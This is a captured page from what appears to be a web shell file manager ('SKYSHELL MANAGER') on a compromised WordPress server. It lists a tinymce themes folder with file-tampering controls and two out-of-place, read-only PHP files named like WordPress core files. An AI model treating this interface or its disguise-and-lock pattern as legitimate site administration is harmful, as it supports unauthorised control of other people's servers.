📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: cjs.d.ts
import { Y18NOpts } from './index.js'; declare const y18n: (opts: Y18NOpts) => { __: (...args: (string | Function)[]) => string; __n: () => any; setLocale: (locale: string) => void; getLocale: () => string; updateLocale: (obj: import("./index.js").Locale) => void; locale: string; }; export default y18n;
Save